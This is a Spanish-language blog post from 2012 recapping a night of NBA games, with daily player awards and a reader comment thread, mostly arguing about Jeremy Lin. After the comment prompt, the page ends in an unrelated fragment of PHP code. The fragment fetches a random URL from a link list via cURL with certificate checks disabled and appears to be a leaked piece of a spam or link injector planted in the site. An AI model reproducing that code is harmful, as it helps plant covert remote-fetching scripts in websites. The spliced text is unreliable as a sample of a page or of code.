La Crónica: Los Mavs empiezan a carburar

14 de February de 2012 por TheDeerHunter

Parece que los campeones por fin han recuperado el tono. 4ª victoria consecutiva, la de anoche contra los líderes de la Pacífico (92-96). Bonito duelo Dirk vs Griffin. Se vió un tanto estropeado por el desacierto de ambos, especialmente en los tiros libres por parte de Mr. Mate, pero todo queda perdonado por los últimos 6 minutos de Nowitzki sólo al alcance de un genio de su talla. Bien haría “la Bestia” tomando nota.

Menos problemas tuvieron los Heat en una dura plaza como es Milwaukee (114-96). Delfino le plantó cara de la buena a todo un LeBron en modo MVP. Tampoco sufrieron los Sixers en Charlotte (98-89). Los locales están para pocos trotes con 15 derrotas seguiditas. Qué lástima.

Tropiezo significativo de los Jazz en Nueva Orleans (80-86). Los Hornets se mueren por traspasar a Kaman, pero mientras se les ha ocurrido la brillantísima idea de que puede ser un buen escaparate dejarle demostrar su buen hacer en cancha. Él posiblemente también está deseando largarse del tugurio, así que no le hace ascos a cuajar buenos partidos como el de anoche. Los Jazz pierden bastante lejos de Salt Lake y en New Orleans comentan ahora que Gordon tiene para mes y medio más. Me da que poco le van a ver el pelo…

Finalmente los Wolves pierden comba y sufrieron su 4ª consecutiva ante Orlando (89-102). Los Warriors aprovechan para alcanzarles con su victoria (3ª seguida) ante Phoenix (96-102). Gran partido de Lee.

PREMIOS

MVP: Lebron James ha sido nuevamente el mejor jugador del día. Sus 35 puntos (16 de 21) y 8 rebotes fueron demasiado para los Bucks. ¡Y los consiguió en 33 minutos!

Rookie: En un mismo partido pudimos ver hasta 3 actuaciones interesantes protagonizadas por rookies. Kemba Walker fue el mejor con 21 puntos, 3 rebotes y 5 asistencias, Bismack Biyombo aportó 7 puntos y 7 rebotes y Nikola Vucevic se fue a los 8 puntos, 10 rebotes y 2 tapones. Por su parte, Ricky Rubio consiguió 11 puntos y repartió 8 asistencias. De todas maneras, el mejor fue Gustavo Ayon. El mejicano anotó 13 puntos (6 de 7), capturó 9 rebots y puso 3 tapones.

Sorpresa: Partidazo del pívot de los Hornets, Chris Kaman protagonizó su mejor actuación de la temporada, 27 puntos y 13 rebotes que dieron una victoria muy buscada a su equipo.

Decepción: Paul Millsap vivió una de sus peores noche de las últimas temporadas. 4 puntos y 5 rebotes ante el “potente” juego interior de New Orleans.

Esfuerzo en vano: El polaco Marcin Gortat está cuajando una buena campaña en los Suns. Anoche se fue a los 25 puntos y 12 rebotes pero se quedó sin victoria. No es la primera, ni será la última, vez que le pasa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

71 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Ostiaputa, buzzer beater como quien no quiere la cosa

      Citar

  2. Alfredo dice:
    #2

    Y por hablar, Lin mete dos triples y gana el partido solito… Que clase tiene, aunque Ricky el otro día supo frenarlo a medias

      Citar

  3. Esteban dice:
    #3

    wowwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

    jeremy lin!! sin dudas ganara el jugador de mejor progreso ya que no le pueden dar el rookie del año
    quiza si sige ganando NY gane el MVP

    27 pntos 11 asistencias, 6 pàrtido ganado el fila desde su explosion, y tiro ganador, habia hecho un buen partido calderon, pero q cierre de LIN,

    voy a comprarme su camiseta ahora mismo

      Citar

  4. HisRoyalAirness dice:
    #4

    pero lo de las 8 pérdidas es para hacérselo mirar

      Citar

  5. Esteban dice:
    #5

    espero con ansias que se lesione algun rookie o sophomore, este fin de semana no puede faltar LIN, incluso merece ir al juego de mayores

      Citar

  6. Esteban dice:
    #6

    pierde mucho balones por que arriesga mucho tambien, vamos che 8 perdidas no son nada si clava 27 puntos y 11 asistencias que podrian haber sido mas

    27 putnso y que PUNTOS! 6 en los ultimos 40 seg de juego

    MVP!

      Citar

  7. Viva_Dirk dice:
    #7

    No fastidies hombre, precisamente lo dificil de dar 11 asistencias es no perder muchos balones. Espero verlo con los Knicks al completo y sin el revuelo que hay a su alrededor.

      Citar

  8. Esteban dice:
    #8

    Viva_Dirk:
    No fastidies hombre, precisamente lo dificil de dar 11 asistencias es no perder muchos balones. Espero verlo con los Knicks al completo y sin el revuelo que hay a su alrededor.

    bueno hombre, u odias a los knicks o tienes algo con los asiaticos, como no puedes disfrutas de un tio jugando asi? viste el triple del final? calderon venia ganandole el duelo y finalizo en ridiculo, en los minutos finales se ven los hombres y vaya que lin lo es

      Citar

  9. Viva_Dirk dice:
    #9

    Los hombres, como dije después del 2º buen partido de Lin se ven a la larga, y ahí no confio mucho en Lin.

    Y no, la verdad es que no disfruto mucho de un jugador así, que ha terminado el partido habiendo acaparado el balón en mas del 50% de los ataques de su equipo. El triple final una pasada, eso si.

      Citar

  10. Esteban dice:
    #10

    no fue su mejor partido, incluso uno discreto, ny llego a perder por casi 20 por momentos, a amare lo topaban todos, y asi y todo ganan el partido y lin sale como un heroe de la cancha, ademas no perdio ningun balon en los momentos decisivos

    con los knicks completos, puede complciarsele hoy hasta se lo noto inhibido por amare, ni quiero pensar con melo, pero se las rebusco para cerrar el partido el,

    ah es la 6ta victoria consecutiva de su equipo, gracias a el los PO aun son posibles…

      Citar

  11. Len Bias dice:
    #11

    Esteban, en una de estas vas a mojar los pantalones con Lin, relajate hombre

      Citar

  12. Esteban dice:
    #12

    no lo merece? jeje

      Citar

  13. Vader dice:
    #13

    Sigue perdiendo demasiados balones y sigue tirando demasiado para mi gusto, supongo que esto se debe a;

    1) Es prácticamente un rookie.
    2) No va sobrado de talento.
    3) Falta el principal anotador (Melo).
    4) Agotamiento. Es un jugador muy intenso y juega muchos minutos día tras día sin estar acostumbrado.

    Espero que cuando vaya cogiendo experiencia y con el regreso de Melo vaya rebajando sus pérdidas y pueda mejorar su ratio de asistencias/pérdidas.

    Pero esta claro que este tio nos ha salvado la temporada, estamos en posiciones de playoff, con una dinámica positiva y con el puesto de base cubierto cuando hace una semana era un solar.

    Hoy jugamos contra Sacramento y el 17 contra New Orleans, a ver si apretamos y nos ponemos en positivo aprovechando que son rivales asequibles.

    Saludos

      Citar

  14. Sancho88 dice:
    #14

    Ben Wallace ha metido un triple esta noche… y ya van ¡¡7!! en su carrera. A este paso quizás llegue a superar algún día a Allen… xd

      Citar

  15. Sancho88 dice:
    #15

    Por cierto, creo que ya hay un digno sucesor de Bowen en la liga… lo que le ha hecho Trevor Booker a Aldridge es para expulsarle durante 10-20 partidos. Eso es claramente a traición. Los Blazers por debajo del 50% de victorias siendo el 5º equipo de la liga que más dinero gasta en salarios por encima de Knicks, Bulls, Mavericks, Spurs… que cada uno saque sus propias conclusiones

      Citar

  16. melo15 dice:
    #16

    Bueno, otro partido bueno de Lin, aunque bastantes perdidas, al final Amar’e ha jugado bien o no??

      Citar

  17. melo15 dice:
    #17

    Bueno, otro partido bueno de Lin, aunque bastantes perdidas, al final Amar’e ha jugado bien o no??
    Yo he decidido, no ilusionarme mucho con los Knicks, hasta que ganemos a alguien medianamente bueno

      Citar

  18. Nacho dice:
    #18

    melo15: Bueno, otro partido bueno de Lin, aunque bastantes perdidas, al final Amar’e ha jugado bien o no??Yo he decidido, no ilusionarme mucho con los Knicks, hasta que ganemos a alguien medianamente bueno

    ¡Hombre!, los Lakers al menos son medianamente buenos, por muchos palos que les demos aquí. Es más yo aventuro que jugarán las dos finales, sobre todo si firman a Arenas. Un tipo que no será tan tonto como para desperdiciar esta oportunidad, sabiendo que los cuartos están a buen recaudo y puede pelear por un anillo, que es lo que le falta. Y como diría Montes: ¡Arenaaas, las pistolas son para el verano!

    Sobre el fenómeno Lin, es obvio, que de momento el chico está tocado por una varita, veremos lo que dura, pero los escépticos deberían tratarlo con más mesura. Es obvio que sus números y su importancia van a descender, apuntarse a eso es apuntarse a carro ganador, ¿no Viva?. Pero nadie puede quitar estos partidos. Yo lo vi contra LAL, estuvo inmenso, contra Minnesota empezó muy bien, se desinfló, pero tuvo arrestos para ganar el partido. Y sobre lo de ayer, solo he visto los minutos finales, pero gana el partido. LO GANA. Y ahí, caballeros, toca callarse. ¿Qué pasa, que sólo le contamos las pérdidas a él? Por mí como si pierde 25 si luego gana el partido. A ver si estamos alabando a tipos que luego no dan la cara en los minutos finales y a éste ya le vamos metiendo palos en los radios. Es probable que sea flor de un mes. Pero ¡coñe!, disfrutemos ese mes. Pienso que a veces por llevar la contraria, por no subirnos al carro de lo ‘mediático’ nos embarcamos ebn defensa de lo ‘genuino’ lo ‘puro’ y cosas así.
    Bueno, basta de parrafada por hoy.

      Citar

  19. simon dice:
    #19

    Nacho con este ultimo comentario has sentado catedra. 100×100 de acuerdo punto por punto, menos en tu prediccion de arenas… yo sigo sin verlo.

      Citar

  20. simon dice:
    #20

    Sancho88:
    Por cierto, creo que ya hay un digno sucesor de Bowen en la liga… lo que le ha hecho Trevor Booker a Aldridge es para expulsarle durante 10-20 partidos. Eso es claramente a traición. Los Blazers por debajo del 50% de victorias siendo el 5º equipo de la liga que más dinero gasta en salarios por encima de Knicks, Bulls, Mavericks, Spurs… que cada uno saque sus propias conclusiones

    Hombre tu comentario es muy ventajista, quitale a cualquier equipo de la liga a un top-3 en su posición y verás donde queda… Gastan mucho si, pero es que sumandole a Roy en forma serían el contender nº 1 del OESTE. Ahora mismo estan en tierra de nadie, pq gastan como un equipo contender pero estan en una mini-reconstruccion.

      Citar

  21. Viva_Dirk dice:
    #21

    Nacho:
    Sobre el fenómeno Lin, es obvio, que de momento el chico está tocado por una varita, veremos lo que dura, pero los escépticos deberían tratarlo con más mesura. Es obvio que sus números y su importancia van a descender, apuntarse a eso es apuntarse a carro ganador, ¿no Viva?. Pero nadie puede quitar estos partidos.

    Yo lo único que digo es que ‘fenómenos’ momentaneos hemos vivido muchos, otra cosa es asentarse como un jugador de gran nivel, y eso es algo en lo que yo no confio que haga Lin.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>